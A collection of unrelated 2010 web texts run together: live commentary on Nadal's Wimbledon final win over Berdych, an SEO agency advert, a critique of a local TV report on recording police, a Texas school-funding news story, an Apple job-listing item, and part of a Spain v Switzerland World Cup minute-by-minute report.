It is the cruel logic of the gentlemen 's singles draw that it eventually gives us one winner and 127 losers .
The opening round provides a mass cull of 64 hopefuls , a bloodbath in tennis whites , after which the survivors are ushered through , wearied and relieved , only to find themselves picked off at a slower ( though no less remorseless ) rate until there is just one more victim to find .
Today , the thinking goes , that victim will be Tomas Berdych .
The 24 - year - old Czech has exceeded the world 's ( and possibly his own ) expectations at this event .
He demolished six - time champion Roger Federer in the quarter - finals and put Novak Djokovic to the sword in the semis .
He is possessed of a fearsome serve and a monster forehand and has shown , time and again , that he can keep a cool head in a crisis .
But facing him across the net is Rafael Nadal , the world number one , who missed the chance to defend his title last year and is now in the final stages of his mission to reclaim the kingdom .
Nadal and Berdych have met 10 times before , with the Spaniard carrying a seven - three lead .
Once , some years ago , the Czech was able to dominate Nadal with sheer , brutish power .
Since then , it 's been one - way traffic .
They have met once before on the lawns of Wimbledon , in the 2007 quarter - finals .
Nadal won that one 7 - 6 , 6 - 4 , 6 - 2 .
How to sum up today 's men 's singles final ?
Kevin Mitchell , the Guardian 's tennis correspondent compares it to a tussle between a bull and a matador except that on this occasion , he says , the bull will win .
Similarly , you could view this one as a contest between the boxer and the puncher .
Nadal is the former ; quick , clever and industrious ; working his man over with a flurry of body - blows and using swift footwork to keep out of danger .
Berdych is the puncher .
His plan is to plant his feet , bring back his arm and throw hay - maker bombs off either wing .
If he can connect with enough of these , he might just knock the number one to the turf .
The past three finals have served up five - set classics ( Federer over Nadal in 2007 ; Nadal over Federer in 2008 ; Federer versus Roddick in 2009 ) .
But I 'm not sure this one will quite go the distance .
Random prediction : Berdych will belt more outright winners than Nadal , but it wo n't be enough to bring him victory .
Nadal has too much in his arsenal .
His work - rate is too lively .
He should grind the Czech down , wear him out and win in four .
The knock - up : Tomas Berdych is first out of the locker room , with Nadal trailing just behind .
The Czech slumps in his seat and hands a quartet of bottles to a ball - boy .
The bottles are full of a cloudy yellow liquid and are no doubt urine samples , handed over in advance ahead of the obligatory drugs test .
Berdych hands them over willingly , with the hint of a sheepish smile .
It is a smile that says :
Hey , I have nothing to worry about .
But this is a bit embarrassing all the same .
Rafael Nadal runs to the baseline to begin the knock - up , bouncing on his feet to get the juices flowing .
It is a clear , warm day on Centre Court , but the wind has picked up and the breeze blows the top - soil off the ground .
The general feeling is that , assuming the wind is a factor , it will effect Berdych 's big-hitting , precision game more than it does Nadal's .
We shall see .
At the baseline , the 12th - seed Berdych limbers up with half - speed forehands and backhands .
He is the first Czech to reach the men's singles final since Ivan Lendl , arguably the greatest player never to win this title .
Lendl battled through to the final Sunday twice , in 1986 and 1987 , but his angular game was fatally unsuited to the slick courts and low - bouncing ball .
These days the ground is firmer and the balls are slower and Nadal enthuses that there is not much difference between the grass and the clay .
That works to Berdych 's advantage too .
He is a big man and likes a ball that sits up high , hanging in the air and waiting for him to hit it .
First set , Berdych * 1 - 0 Nadal : Tomas Berdych barrels quickly out of the blocks .
His serve is working and his forehand is in the groove and Nadal is left to scramble about the baseline , still in search of his rhythm .
Love game to the Czech .
First set , Berdych 1 - 1 Nadal* : " I love you , Rafa ! " shouts a man in the stands .
It may be Uncle Toni , who controversially coached his nephew during a torrid five - set victory over Philipp Petzschner in round three .
Or maybe not .
The Spaniard is a hugely popular figure out here and the crowd applauds warmly as he coasts through a love game of his own .
First set , Berdych * 2 - 1 Nadal :
An encouraging early sign for Nadal .
He catches the Berdych serve on his forehand , flicking his return back deep to catch the 12th - seed napping .
But finding a rhythm is tough against Berdych , who hits fast and deep , going for the winner at the earliest opportunity .
The Czech holds to 15 .
First set , Berdych 2 - 2 Nadal* : Rafael Nadal 's serve may well be his most underrated weapon .
It comes through quick , with kick and disguise , and Berdych struggles to get a reading on it .
But he makes some crucial inroads here , scrambling into position to test the Spaniard with a lob and then clobber him with forehand drives to either side .
At 30 - all he has a chance , yet the chance comes and goes , kicking off the turf and out towards the stands .
First set , Berdych * 3 - 2 Nadal : The 12th - seed decides to press forward and kill Nadal at the net .
He chugs north like a battleship , his guns blazing , unconcerned when the Spaniard laces him with a forehand pass .
Keep going , keep going .
Take the fight to the world number one .
The tactic works and Berdych holds to 15 .
First set , Berdych 3 - 3 Nadal * :
But now , with a grunt and a crack , come the ominous signs that Nadal 's game is slipping into gear .
His forehand , comparatively muted in the early games , abruptly starts zipping through and rearing off the baseline and the kick serve comes good with ace number - three .
And with that we 're level : three - all in the first .
First set , Berdych * 3 - 4 Nadal : Panic stations , panic stations !
The sirens are wailing , indicating that the battleship is holed below the waterline .
Berdych rolls forward again , only for Nadal to tear him apart with a forehand pass down the line to bring up love - 40 .
Already , several crew members are seen dragging out the life - raft .
Berdych saves one point with that big , clubbing forehand but he can't salvage the next .
Nadal breaks and pulls ahead .
First set , Berdych 3 - 5 Nadal* :
Now a stretch of clear blue water opens up between Rafa Nadal and lumbering Tomas Berdych .
The Czech is pegged back on the baseline , unable to move his feet and control his drives .
On the last point , Nadal gives him the run-around , sending the Czech off to the right as he hooks a sugar - sweet forehand back behind his man .
NADAL WINS THE FIRST SET , 6 - 3 : Just what is Berdych 's game - plan today ?
Has he lost the map or is he merely reading it upside - down ?
If the Czech stands at the baseline , feeding Nadal balls like he 's doing right now , then he 'll be on the ocean - bed in about an hour 's time .
He has to try something different ; has to take his chances ; has to knock Nadal off his stride .
The Spaniard breaks again to put the opening set in his pocket .
Second set , Nadal * leads Berdych 6 - 3 , 1 - 0 : Run , thinks Tomas Berdych .
I can still run at least .
So Berdych runs , hauling his heavy frame around the back - court until one , two , three break points bob gloriously into view .
Can he grasp them ?
No he cannot .
The number one promptly knocks him off - course with a flurry of swinging serves and kicking forehands , and the Czech is still floundering .
Now the wind is picking up , whipping white - caps off the court .
It blows Nadal 's hair across his brow and disrupts his ball toss .
Might it blow some good news in Berdych 's direction ?
Again , no .
The Czech blasts a forehand wide to slip one game behind .
Second set , Nadal leads Berdych * 6 - 3 , 1 - 1 : A - ha : here at last is a glimpse of the Berdych who whopped Federer and flattened Djokovic .
He opens his shoulders and tilts at the lines , crowning a love game with a thunderous ace down the middle .
Second set , Nadal * leads Berdych 6 - 3 , 2 - 1 : Now it is Nadal 's turn to run - run !
- around the back - court , scampering this way and that and inviting Berdych to hit just one more shot to finish him off .
Did I say just one more ?
Make that two more , three more .
One more than you can manage .
Second set , Nadal leads Berdych * 6 - 3 , 2 - 2 : A fresh thought wafts through Berdych 's head and he seizes at it , a drowning man .
Hit aces , he thinks .
Hit ACES !
He hits aces and holds to love .
Second set , Nadal * leads Berdych * 6 - 3 , 3 - 2 : The Spaniard 's pressure appears to be telling as Berdych blunders impotently off in pursuit of those probing topspin forehands .
He reaches one and sends it off into the crowd .
He reaches another and slaps it at his own feet .
This was not what he meant to do .
Second set , Nadal leads Berdych * 6 - 3 , 3 - 3 : Bottle this game , it 's Berdych in essence .
Most of the time he just hits aces .
Other times he hits heavy first serves , is gifted with a weak reply and is able to strike a winner off the forehand .
It 's a great bottle , an impressive bottle .
But it is drifting , drifting miles from shore .
Second set , Nadal * leads Berdych 6 - 3 , 4 - 3 : Let 's state the obvious : Berdych needs to get a handle on Nadal 's serve very soon .
The Spaniard is holding easily , firing that kick serve out wide and scampering in to nail a backhand volley .
Second set , Nadal leads Berdych * 6 - 3 , 4 - 4 : Aces , thinks Berdych .
Aces !
It is the only word rattling in his tormented skull right now .
It is his north star , his lucky heather .
Aces .
Second set , Nadal * leads Berdych 6 - 3 , 5 - 4 : The pugilists jab and parry but Nadal is quicker , cleverer ; he makes Berdych looks clumsy .
The Spaniard holds to love .
Second set , Nadal leads Berdych * 6 - 3 , 5 - 5 : Nadal jumps to love - 15 , making Berdych stoop low to dig out a volley and then lancing him with a clean forehand pass .
The Czech 's Wimbledon campaign is now hanging entirely on his first serve .
It 's the serve that is delaying Nadal 's progress , the aces that are keeping Berdych in this match .
He hits another out wide to the backhand and keeps level ; five - all in the second .
Second set , Nadal * leads Berdych 6 - 3 , 6 - 5 : The 12th - seed would dearly love to get hold of some of these returns .
He is angry and frustrated , his temper fraying beneath his baseball cap .
If God were to give him just a split second longer , he could plant his feet and ram the thing right back down the Spaniard 's throat .
But he is being rushed and distracted and is one - step late on almost all of his shots .
NADAL WINS THE SECOND SET , 7 - 5 : It 's love - 15 , it 's love - 30 and Nadal scents blood in the water .
In his fury , Berdych hits out ( literally ) and now it 's love - 40 .
The Spaniard duly takes set number two as another Berdych torpedo floats wide .
Third set , Nadal * leads Berdych 6 - 3 , 7 - 5 , 1 - 0 : Tomas Berdych lines up his cannons for one last assault , blasting Nadal off court and then shunting forward to kill the point at the net .
But what 's that in front of him ?
Why , it is none other than Nadal , the man who a second ago was off way off in the stands .
The Spaniard takes the ball on his backhand and rifles it for the pass .
Third set , Nadal leads Berdych * 6 - 3 , 7 - 5 , 1 - 1 : Punch - drunk and weary , Berdych goes forward again .
The back - court has been no friend to him in this match ; maybe the net will be kinder .
He reaches for a forehand volley , listing on one leg and sees the ball drop blissfully on a vacant patch of grass .
Third set , Nadal * leads Berdych 6 - 3 , 7 - 5 , 2 - 1 : Now , through the murk and the seaweed , a bold idea washes like a miracle into the Czech 's harried brain .
Go forward , says the idea .
Volley at the net .
He follows the idea where it leads ( north ; forward ) and abruptly arrives at break point .
But this time Nadal gives him no chance to run forward , pushing him back until an exhausted backhand pops into the tape .
And so Berdych trudges back to his seat , flapping his racket in fury .
Not waving , but drowning .
Third set , Nadal leads Berdych * 6 - 3 , 7 - 5 , 2 - 2 : Bliss for Berdych ; salvation for Berdych .
The Czech bags an easy game .
Third set , Nadal * leads Berdych 6 - 3 , 7 - 5 , 3 - 2 : How much longer can Tomas Berdych stay afloat in these choppy waters ?
He kicks feebly and keeps dipping below the surface .
He has yet to engineer a break of the Nadal serve and fares no better here .
The Spaniard holds serenely to 15 .
Third set , Nadal leads Berdych * 6 - 3 , 7 - 5 , 3 - 3 : Boom , go the Tomas Berdych aces .
Boom .
Seldom has the noise sounded more poignant .
The Czech has nothing more to give except booming aces and the occasional death - or - glory run to the net .
Third set , Nadal * leads Berdych 6 - 3 , 7 - 5 , 4 - 3 : With a shuffle of feet and a flex of forearm , Rafa Nadal scurries into the backhand side to lash a lethal south - paw forehand , inside - out , to the far corner of the court .
Berdych runs for it , but his pursuit is merely for form 's sake .
Third set , Nadal leads Berdych * 6 - 3 , 7 - 5 , 4 - 4 : At 40 - 15 , Berdych gropes and fumbles and finds forward gear again .
But at the net , he is abruptly passed by a high forehand , slathered with topspin that drops way inside the baseline .
Nothing else for it : he falls back on his heavy first serve and ties the score at four - all .
Third set , Nadal * leads Berdych 6 - 3 , 7 - 5 , 5 - 4 : Whip - crackaway , whip - crackaway .
It 's yet another love game for the Spanish Armada .
" This is obscene , " says Shreela via email .
" Give me something ... anything to justify my presence in front of the telly . "
I 'm guessing our correspondent is referring to the tennis , and to the brutal bashing that Nadal is inflicting on Berdych .
But Flog
It is currently airing on BBC2 and Shreela may just as easily be referring to that .
NADAL WINS , 6 - 3 , 7 - 5 , 6 - 4 : Is he down ?
Has he sunk ?
Does he sleep with all the fishes ?
The Berdych battleship lists to love - 30 , courtesy of a devastating pass from the Spaniard .
He makes one last attempt , hauling himself back up to 40 - 30 .
But the legs are gone and the brain is soup , and a moment later it 's match point Nadal .
Go forward , thinks Berdych .
It 's worked in the past and it may work again .
It does n't .
Nadal catches him with a lashing , whip - crack pass on the forehand , the ball zipping cross-court and kicking happily off the grass .
And Rafael Nadal is Wimbledon champion for the second time .
The presentation : Rafa Nadal 's 2009 Wimbledon defence was killed off by a dodgy knee but he came this year as a man on a mission .
His vital , vigorous game was too much for hulking Tomas Berdych .
The Czech pretender sunk swiftly to the ocean floor where his big - hitting game sprouted barnacles .
Try as he might , Berdych had no answer to the Spaniard 's onslaught and promptly went down at the end of each set .
On court , Nadal steps forward to collect his trophy .
This is his second Wimbledon title and his eighth grand slam in all .
That puts him level with the likes of Jimmy Connors , Ivan Lendl and Andre Agassi on the pantheon of all - time greats .
In the meantime , the BBC TV coverage continues to excise some viewers .
Mark Taylor 's beef is with the cameramen : " Their obsession with zooming in on rich people groping and pawing at each other during the games is making me feel ill .
Not a classic final by any means but surely they can find other things to show us . "
Apologies , by the way , for the lack of email banter .
I received a sum total of seven emails during the course of this match - five of which were from people requesting more email banter .
And yes , I did consider cutting and pasting these missives , but it all felt a bit too meta and postmodern somehow .
Thanks for sticking with me all the same .
So that 's that ; Wimbledon been and gone for another year .
It was , as Mark Taylor points out , hardly a classic final .
But it has at least provided a classic champion : a tireless whirling dervish who deals in a unique brand of non-malicious violence ; a man who directs his fury at the ball but never at his opponent .
So the bull gored the matador ; the boxer out - thought the puncher .
Rafael Nadal stands proud as winner of the 2010 Wimbledon championship .
" I requested Brendan from My Local Web Designer to make a website for me that not only looks good , but also drives me traffic and makes me money .
Well the site certainly delivered .
I made $ 20,000 extra in the first month of the site being done by them . - Darryl Smithwww.freeholidays7days.com "
Ever fancied seeing your website figure at the top of a Google search ?
We are an online marketing agency providing expert search engine optimization solutions ( SEO ) to our clients .
Our diligent SEO team makes sure that your websites figure at the top of Google searches for various keyword phrases relevant to your industry .
Thus far we have managed a first page ranking for each and every SEO client we have ever worked with , sounds good ?
Irrespective of whether you are a small company wanting to expand your business or a larger one who wants to increase their market share , we have a search engine optimization solution that would suit your needs .
We are an online marketing agency providing expert search engine optimization solutions ( SEO ) to our clients .
Our diligent SEO team makes sure that your websites figure at the top of Google searches for various keyword phrases relevant to your industry .
Thus far we have managed a first page ranking for each and every SEO client we have ever worked with , sounds good ?
Irrespective of whether you are a small company wanting to expand your business or a larger one who wants to increase their market share , we have a search engine optimization solution that would suit your needs .
Most Recent SEO Rankings
Click here for more details on search engine optimisation solutions
Performance SEO
SEO Foundation
Introductory SEO
Hotel SEO
Click on one of the thumbnails below to check out some of our latest SEO rankings that we helped our client achieve .
Our performance SEO solution has been designed in a way that will help your company grow at the rate of knots .
We take the rankings of your most relevant keyword phrase and tie it to our management fee .
This is our most powerful SEO solution on offer .
Click here for more details on Performance SEO
This one ’s meant for your website if it ’s still under construction , we provide you the much needed head start in SEO rankings .
SEO foundation will help you achieve the rankings you ’ve always wanted by setting you off on the right foot in the eyes of the most popular search engines .
Click here for more details on SEO Foundation Just want to get a feel of the SEO magic , without shelling out the big bucks ?
Then this introductory entry level package is the right thing for you .
It ’s meant for the relatively smaller businesses who want to increase their traffic by ranking higher on Google search results .
Click here for more details on Introductory SEO
Our vast experience in dealing with the hospitality industry and our technically trained staff who have a track record of delivering only the best there is ; will help make sure that your property reaches the heights you always wanted it to .
Click here for more details on Hotel SEO
The Norman Lear Center at the University of Southern California 's Annenberg School for Communication and Journalism recently surveyed 490 hours of local news reports in the Los Angeles area and found what most people who watch local news probably already knew :
It 's dreadful .
The survey found that the average amount of time devoted to actual local news was less than the time given to commercials .
The most covered local news topic was crime , but as local news consumers are all too aware , coverage of crime at the local level ( or for that matter , at the national level ) tends to be sensationalist , honing in on single - incident , high - profile crimes rather than providing any serious coverage of broader criminal justice policy .
I 've been writing about the criminal justice system for several years now , and I have repeatedly seen local news reports butcher the particular topics or specific incidents in which I have some expertise ( here 's one example ; here 's another ) .
It 's downright frightening to imagine just how much bad information local newscasts probably deliver on other topics from night to night , particulalry given that local TV is the primary source of news for most Americans .
To illustrate , consider the report below from WJET , the ABC affiliate in Erie , Pennsylvania .
The segment looks at the legal debate over citizens recording on - duty police officers , a topic I 've covered in depth over the last few months .
The report was captured by a local police watchdog group and posted to YouTube .
Here 's what the report gets right :
There have been some stories in the news of late about people getting arrested for recording police officers in public .
Here 's what the report gets wrong : almost everything else .
First , watch :
The impetus for this story likely came from an article by Wendy McElroy called " Are Cameras the New Guns ? " which was picked up by Gizmodo a couple weeks before the WJET story ran , then went viral .
But if all you knew about the debate over the legality of recording on - duty cops came from the WJET report , you'd be completely misinformed about what 's actually going on .
The anchor kicks off the parade of errors in his lead - in , stating that " a new law gaining ground in about a dozen states " could make shooting video of on - duty police officers illegal .
Almost nothing in that statement is true .
There is no trendy law sweeping state legislatures that makes it illegal to record police .
In fact , no state legislature has expressly made recording cops illegal in more than a decade .
The " dozen states " part likely comes from a line in McElroy 's column noting that there are " 12 states in which all parties must consent for a recording to be legal . "
That is true .
But these laws are n't new , and they are n't " gaining ground . "
Most are decades - old wiretapping laws , some dating back to the 1960s .
Nine of the 12 all - party consent states have a provision which says that in order for there to be a violation of the law , the offended party must have had a reasonable expectation of privacy with respect to the recorded conversation .
To date , both state and federal courts have ruled that on - duty police officers have no expectation of privacy while they are in public .
That means that in those nine states with the privacy provision , it is legal to record cops in public .
It 's also legal to record them in the 38 states that only require one party to a conversation to consent for the conversation to be legally recorded .
This does n't mean that people are n't being arrested for recording cops , it means that many of those arrests are illegal .
The anchor then throws the story to reporter John Treanor , who begins with more misinformation :
Three states have already adopted what 's called a consent law that would mean no citizen could shoot video of a police officer in public without their consent , but it 's a law that 's causing plenty of controversy .
Treanor again makes it sound like these laws are new .
They are n't .
None of the three states to which he 's referring — Illinois , Massachusetts , and Maryland — have passed any recent law on the legality of recording police .
The last significant policy change in Massachusetts came in 2001 , when the state 's highest court upheld the conviction of a man who was charged under the state 's wiretapping statute .
Massachusetts and Illinois are the only two states whose wiretapping laws are both all - party consent and contain no expectation of privacy provision .
The Illinois legislature did pass a law removing the privacy provision , and did so in response to that state 's Supreme Court finding , as other courts have , that police officers in public have no expectation of privacy .
In other words , the state legislature took action for the specific purpose of making it illegal to record cops in public .
But one state does n't make a trend .
And that revision occurred in 1994 .
The only state where there 's been recent action is Maryland , and even there the action has n't come from the legislature .
Maryland has a privacy exemption , but the state 's police organizations and some of its prosecutors have decided to interpret it in a rather absurd way .
Under their reading of the law , when on - duty police officers interact with the public , the cops retain privacy rights with respect to those interactions .
But the citizens they 're interacting with — be it during a traffic stop , an arrest , or some sort of questioning — retain no such rights .
This bizarre new interpretation of state law seems to be in response to a high - profile incident last February where several cell phone cameras recorded Maryland police beating a student in College Park .
Those recordings contradicted accounts of the incident filed in police reports .
But again , there is no new law in Maryland .
Treanor even finds an academic expert to comment on this non-existent trend of non-existent new laws .
Anthony Peyronel , identified as a professor at Edinboro University , makes the predictable prediction that law enforcement groups will love this new law , while media organizations and civil libertarians are likely to hate it .
Peyronel , whom Treanor presumably asked to appear on camera because he has some expertise on these issues , never questions Treanor 's underlying premise .
The expert ends up aiding Treanor and WJET in making Erie viewers more ignorant .
But it gets worse .
The WJET report implies that it is either illegal to record on - duty cops , or it soon could be .
But Pennsylvania , where the report aired , is one state where the courts have made it clear that it is perfectly legal to record on - duty cops .
The Pennsylvania Supreme Court ruled in 1989 that a man who surreptitiously recorded the state trooper recording him could not have violated the state 's wiretapping law because the trooper had no expectation of privacy .
And in 2005 , a federal district court judge in Pennsylvania tossed the conviction of a man arrested for recording police from a nearby field .
That judge added that his ruling was n't even " a close case " and ordered the police officers to pay punitive and compensatory damages .
This is n't to say that people are n't still being arrested for recording cops in public — in Pennsylvania or elsewhere — or that cops are n't still threatening people who attempt to record them with cell phones or other devices .
In fact , in spite of those court rulings , a Pittsburgh man was arrested just last year for recording police officers making an arrest .
But his conviction was also overturned , and he's now suing the police for violating his civil rights .
This is precisely the point WJET misses , and it's where this particular local news reports veers from merely awful to dangerous .
The law is settled in Pennsylvania .
You have the right to record cops in public .
The real story here is that when these arrests happen , it is the police who are violating the law , not the person holding the camera .
In implying that the law is n't yet settled , and that it may soon be illegal to record cops in Pennsylvania , WJET not only botches the facts , it spreads misinformation about a critical issue affecting the relationship between the governing and the governed — the ability to keep public safety officers transparent and accountable .
Radley Balko is a senior editor at Reason magazine .
The proposal would allow the federal government to give money directly to school districts , provided Perry certifies that the federal support will not replace the state money .
Perry must also agree not to proportionally cut education funding more than any other item in the next budget .
While the measure includes $ 10 billion in education funding nationally , Texas is the only state that must make such a certification before receiving the federal funding .
Texas school districts stand to receive about $ 820 million in funding to hire additional employees .
Congressional Democrats pushed for the provision after Texas received more than $ 3 billion from the government in 2009 to boost education funding , only to see Perry not use the funds to augment the education budget .
Democrats charge that while Perry officially accepted the money from Washington , he simultaneously slashed the state 's contributions to the education budget , allowing the state to essentially pocket the federal dollars without increasing school aid .
" Instead of a historic boost in local school support , our schoolchildren were left no better off , " Rep. Lloyd Doggett , D - Austin , said .
" Three billion dollars ( in federal money ) made no difference to our local schools . "
In a statement Friday , Perry 's office urged the Senate to reject the measure .
" At the urging of Texas Democrats , the House has added language to the War Supplemental bill that effectively kills about $ 800 million in federal funding for Texas schools , " said Perry spokeswoman Katherine Cesinger .
" The House - passed version requires that the governor guarantee the Legislature will provide a certain level of state funding , which is prohibited by the Texas Constitution , for education through fiscal year 2013 .
" It will be at least June 1 , 2011 , before the Legislature passes and the comptroller certifies the 2012 - 13 budget .
That means
Texas would not be able to use any of these funds to save teacher jobs — as Congress has intended the money be used - for at least one full school year . "
Several Perry refusals
Perry 's record of refusing federal money for education is not limited to the stimulus funds .
Under Perry , Texas has twice declined to apply for the Race to the Top grant , a federal program that awards money to states for making specific improvements to their education systems , such as enabling more charter schools and creating performance - based pay for teachers and administrators .
Texas Education Commissioner Robert Scott said Friday that Congress is punishing Texas for refusing to participate in such Obama administration education initiatives and Washington has " painted a target on Texas . "
Perry , who has argued the rules for the money infringe on the rights of a state to set its own education standards , has resisted seeking the Race to the Top money .
The Democratic gubernatorial campaign of former Houston Mayor Bill White said the congressional action proved that Perry 's politics had interfered with Texas education .
" In his quest to grandstand about Washington and promote his political career , Perry has proven over and over again that he is only in if for himself , not Texas students , " said Katy Bacon , a spokeswoman for the White campaign .
When it passed its own version of the funding bill in May , the Senate did not include the Texas - specific language .
The measure will returns to the Senate for final consideration .
40 school chiefs want it
Last month , a group of nearly 40 Texas school superintendents , including those from Houston , San Antonio , Dallas , Austin and Laredo , pleaded with Congress to make special arrangements to ensure Texas schools could receive the money .
" The last thing we need to allow is these funds to be diverted , " the superintendents wrote to congressional leaders .
" We hope that you will ensure that Texas school districts do not fall through the cracks this time around . "
But a day after the House action , Houston Independent School District Superintendent Terry Grier expressed disappointment that the money 's primary purpose was to create or maintain jobs , saying he wanted to " help close the achievement gap " with any federal dollars .
" We want the money for reform initiatives , " Grier said .
Stewart Powell of the Washington bureau also contributed to this report .
alan.blinder@chron.com
AppleInsider points to a new Apple job listing that appeared on Monday looking for a software engineer to work on a " revolutionary " new Mac OS X feature .
We are looking for a senior software engineer to help us create a revolutionary new feature in the very foundations of Mac OS X .
We have something truly revolutionary and really exciting in progress and it is going to require your most creative and focused efforts ever .
While Apple is always very careful to not give away too much information about its product development plans in its job posting and this latest one is sufficiently vague that it is impossible to glean any real details on the new feature from it , the new listing does carry a sense of enthusiasm and intrigue not often found in Apple 's job postings .
Are you looking to help create something totally new ?
Something that has never been done before and will truly amaze everyone ?
Are you excited by the prospect that what you helped create would be used every day by millions of Apple customers ?
Then come and work on with the Mac OS X software engineering team to help build a new and revolutionary feature for Mac OS X .
About the only hint of the new feature 's focus comes from Apple 's qualification preferences seeking engineers experienced in HTTP and related protocols , with suggestions of a large - scale Internet - focused perspective .
Evidence of Apple 's work on Mac OS X 10.7 first appeared late last year , with increasing evidence of the OS being used on Apple 's campus showing up in web logs beginning in January of this year .
Hopes for a developer preview at this year 's Worldwide Developers Conference were dashed , however , with the event being primarily focused on the iOS platform amid claims that Apple had diverted resources from the Mac OS X in order to focus on iOS 4 development .
this blog takes an intelligent approach to evaluating the 2010 tax cannabis initiative proposed for california 's november ballot .
STONER BEWARE : this initiative is NOT what you think it is .
if you are passionate about marijuana and legalization , read this blog and see what the initiative really says .
then just vote KNOW .
Preamble Hello .
For years ,
Spain were the swingers of world football : desperate to be in among the hip crowd but never quite sure how to go about it .
Truth was , they were so money and they did n't even know it .
Then , at Euro 2008 , came their epiphany : they found internal peace , realised they did n't have to be like anyone else , and with it came a long - overdue first trophy since 1964 .
Now they are hoping to become the eighth side to win the World Cup ; and , while the rest of the world is getting in a fearful tiswas about Jabulanis , altitude and strap - ons , Spain are going about their work with an intimidating serenity .
They 're not interested in what anyone else is thinking or doing ; nor should they be .
In short – and to continue the half - arsed Swingers riff that came to me during my 184 - second lunch break and which does n't really work , if we 're honest – our babies are all growns up .
Today , against poor old Switzerland , they should hopefully provide an antidote for the sexless football that has permeated this tournament .
If Holland 's so - called Total Footballers gave us football art , then Spain are producing footballl erotica , a sensual feast without comparison in the game 's history .
If they were being played in a film , it would be by Catherine Deneuve .
( England , since you asked , are played by that woman who played Bet Lynch in Corrie . )
If Spain win this World Cup - and , if we are going to get all pompous about this , every right - thinking person should pray that they do - they may go down as the greatest team of all time .
Greater ever than Brazil 's 1970 clodhoppers .
do n't think I 've excited since Glenn Miller arrived at Borden Grammar School one Friday with a copy of Madonna 's Sex book .
That was another let down , of course , but I 'm sure Spain wo n't be .
If they can't energise this World Cup , we might as well all pack up and go home .
Team news Fabregas ?
Not today thanks !
Torres ?
Meh .
Spain ( 4 - 1 - 2-3 ) 1 - Iker Casillas ; 15 - Sergio Ramos , 3 - Gerard Pique , 5 - Carles Puyol , 11 - Joan Capdevila ; 16 - Sergio Busquets ; 8 - Xavi , 14 - Xabi Alonso ; 21 - David Silva , 7 - David Villa , 6 - Andres Iniesta .
Switzerland ( 4 - 4 -2 ) 1 - Diego Benaglio ; 13 - Stephane Grichting , 2 - Stephan Lichtsteiner , 4 - Philippe Senderos , 17 - Reto Ziegler ; 7 - Tranquillo Barnetta , 8 - Gokhan Inler , 6 - Benjamin Huggel , 16 - Gelson Fernandes ; 19 - Eren Derdiyok , 10 - Blaise Nkufo .
Abject clown with a whistle Howard Webb ( England )
Reasons why every right - thinking person should want Spain to win the World Cup , part 1 in a never - ending series .
Spain 's record since winning Euro 2008 P26 W25 D0 L1 F75 .
They won 10 out of 10 in qualification , while Switzerland lost at home to Luxembourg on their way to the finals .
Two ways to make yourself feel better this lunchtime
1 . Put down that salad leaf , you fat git .
2. Sponsor MBMers ' good causes , namely those of Kat Petersen and Poppy McNee and Dan Hickman .
Talking Sense , with Mark O'Neil
" Whilst it would have been nice to have had a few great games by now and some more goals ,
It 's not time to start writing this world cup off yet .
The great World cups are mainly remembered for the knockout stages and I 'd rather have the best teams playing averagely at this point and keeping their powder dry than the false dawn of say 2002 which started brilliantly before dipping to be the worst tournament since 1990 .
There are some potentially epic knockout games on the cards .
I 'm already stoked for Argentina v Germany .
Or it could be rubbish all the way through . "
What he said .
A World Cup 's legacy is approximately one parts group stage , four parts knockout stages , so there 's no need to worry yet .
Remember , for example , that everyone was doing excitable discharges about 2006 after the first week , and it turned out to be a stinker .
While we 're talking about all things coital , are these the best groupies ever ?
( Clue : yes . )
Rumours that Robbie Earle sorted them out with tickets are unconfirmed .
1 min Switzerland assume the position from right to left .
They are in white ; Spain are in red .
" Looking forward to the MBM , " says Leo Lin .
" Work has banned the streaming of TV and radio today so this is my first World Cup game with the Guardian 's MBM ! "
You have my most sincere apologies .
2 min " Well young man , you are getting near the mark , " says Tony Attwood .
" I 'm 62 , nearly 63 , and I go to jive clubs three times a week , and get a lot of dances so do n't smirk .
What 's wrong with old people having fun - I bet we have more fun jiving than people are having watching most of the World Cup . "
Nowt wrong with that at all .
Jive on , brother .
I hope to have some fun when I hit 90 .
Is it still called a knee - trembler at that age or is it more of a kneecap - shatterer ?
3 min The passing carousel gets going for the first time .
After 20 - 25 passes , the left - back Capdevila overhits his cross .
4 min Grichting flattens Busquets 35 yards out , slightly right of centre .
Xavi's free kick is cleared by the erstwhile north London combination of Senderos and Ziegler .
But it 's all Spain : I reckon they 've already racked up 50 successful passes , which is about as many as some Premier League teams manage in an entire half .
It 's all so easy and effortless , but without the kind of arrogance or indulgence that could make it annoying .
They just happen to be a collection of unbelievably good footballers , and they do n't need to go round dancing and telling everyone about it .
They just get on and do their job .
6 min " What the hell is a jive club ? " asks Eoin Fitzpatrick .
I wondered this but thought my carefully built image of effortless urbane cool would be shattered if I displayed such ignorance .
7 min
There is a real fluidity to Spain , as you 'd expect : Silva and Iniesta in particular are wandering where the mood takes them .
Switzerland have had no scares as yet , but it 's been a lovely start from Spain .
9 min " ' If Spain win this World Cup - and , if we are going to get all pompous about this , every right - thinking person should pray that they do , " quotes Richard Vale .
" Err no , every right thinking person wants their own team to win , not the best team to win , weirdo .
If you 'd said ' football lovers will be content if they win , ' something like that , then fair enough .
But all this tosh about loving football for its own sake can only take one so far , partisan involvement is an essential ingredient in enjoying the spectacle . "
Darn , you 're right .
I 've had it wrong all this time .
Silly old me !
Where should I send the editorial consultancy fee ?
10 min Two unusual occurrences .
Switzerland a ) cross the halfway line and b ) win a corner .
It 's headed corner by Alonso at the near post and Spain break beautifully .
Villa on the left plays a one - two with Silva and then tries to run Lichtsteiner in the box .
His touch is a fraction heavy and the keeper Benaglio claims .
11 min Plenty of tic-tac , or whatever they call it , but one thing any team of Ottmar Hitzfeld 's will be is competent defensively , and Switzerland are managing to plug the gaps pretty well for now .
Still , 90 minutes is a very long time to be doing this - as much mentally as physically .
12 min " Yes , yes , they may be a collection of unbelievably good footballers , and rich , and good looking , " says Michael Hunt .
" But they 're probably all lonely and sad on the inside .
That 's what 's keeping me going . "
13 min " Is it wrong that one of the reasons I am looking forward to Spain playing is that they are so pretty ? " says Rachel Clifton .
" Also - beards .
They do love a beard in Spain and I think we do n't see enough of those in international sport anymore . "
14 min Busquets falls over .
So far , so normal , but this time it was after a foul from Imler .
The free kick , 35 yards out , is taken short and Spain resume normal service .
It 's bewitching stuff , albeit relatively harmless at the moment .
Switzerland will be pleased with their start , if you can be pleased with having about four touches of the ball in 15 minutes .
MBM Howard Webb Photograph : PA
15 min Silva stumbles over after a clumsy challenge from Senderos on the left of the box .
There was no real appeal , just a sly look from Silva towards Howard Webb , but he did n't get the ball and I do n't think Switzerland could have complained had that been given .
